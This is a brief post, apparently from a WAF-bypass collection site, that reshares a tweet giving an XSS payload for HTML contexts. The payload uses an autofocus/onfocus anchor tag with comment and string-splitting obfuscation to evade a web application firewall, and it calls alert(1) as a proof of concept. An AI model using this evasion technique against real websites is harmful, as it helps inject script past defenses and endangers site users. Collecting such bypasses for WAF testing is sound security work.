WAF bypass by KN0X55

Date: May 21, 2024Author: wafbypass

A bypass for a WAF in HTML scenario has been discovered for XSS vulnerability. The payload used for bypass is <A HRef=\" AutoFocus OnFocus=top/**/?.['al'%2B'ert'](1)>. This bypass makes XSS attacks easy. More details can be found in the tweet by @KN0X55. Sign up now! https://t.co/nNqODwzUC0

#WAF #Bypass

For HTML scenarios
by @KN0X55

<A HRef=" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>

Sign up now!https://t.co/nNqODwzUC0 #XSS made easy.

— KNOXSS (@KN0X55) May 2, 2024

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools

How to test, evaluate, compare, and bypass web application and API security solutions like WAF, NGWAF, RASP, and WAAP

WAF bypass by KN0X55